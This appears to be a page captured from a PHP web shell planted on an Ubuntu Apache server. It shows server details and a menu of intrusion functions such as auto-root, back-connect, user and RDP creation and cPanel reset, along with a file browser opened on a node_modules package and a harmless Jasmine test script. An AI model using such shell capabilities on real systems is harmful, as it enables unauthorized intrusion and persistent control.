Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
fast-json-patch /
[ HOME SHELL ]
Name
Size
Permission
Action
commonjs
[ DIR ]
drwxrwxr-x
dist
[ DIR ]
drwxrwxr-x
module
[ DIR ]
drwxrwxr-x
LICENSE.txt
1.06
KB
-rw-rw-r--
README.md
17.76
KB
-rw-rw-r--
index.d.ts
1.84
KB
-rw-rw-r--
index.js
407
B
-rw-rw-r--
index.mjs
659
B
-rw-rw-r--
index.ts
611
B
-rw-rw-r--
jasmine-run.mjs
631
B
-rw-rw-r--
package.json
2.61
KB
-rw-rw-r--
tsc-to-mjs.sh
405
B
-rw-rw-r--
webpack.config.js
1.35
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jasmine-run.mjs
import glob from 'glob'; import Jasmine from 'jasmine'; const jasmine = new Jasmine(); jasmine.loadConfigFile('test/jasmine.json'); const pattern = process.argv[2] || 'test/spec/*.js'; // Load your specs glob(pattern, function (er, files) { Promise.all( files // Use relative paths .map(f => f.replace(/^([^\/])/, './$1')) .map(f => import(f) .catch(e => { console.error('** Error loading ' + f + ': '); console.error(e); process.exit(1); })) ) .then(() => jasmine.execute()); });
Close